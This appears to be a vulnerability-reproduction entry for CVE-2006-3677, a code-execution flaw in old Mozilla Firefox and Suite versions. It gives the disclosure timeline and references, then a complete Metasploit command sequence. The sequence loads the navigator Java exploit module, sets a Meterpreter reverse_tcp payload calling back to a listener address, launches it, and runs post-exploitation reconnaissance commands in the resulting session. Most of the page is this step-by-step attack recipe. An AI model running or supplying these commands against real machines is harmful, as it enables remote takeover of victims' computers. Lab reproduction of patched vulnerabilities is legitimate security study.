CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI on 2006-06-16
Coordinated vulnerability disclosure on 2006-07-26
PoC provided by hdm on 2006-07-27
Metasploit PoC provided on 2006-07-30

PoC provided by :

hdm

Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

Affected version(s) :

Firefox versions prior to 1.5.0.5

Tested on Windows XP SP3 with :

Firefox 1.5.0.4

Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

Commands :

use exploit/multi/browser/mozilla_navigatorjava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig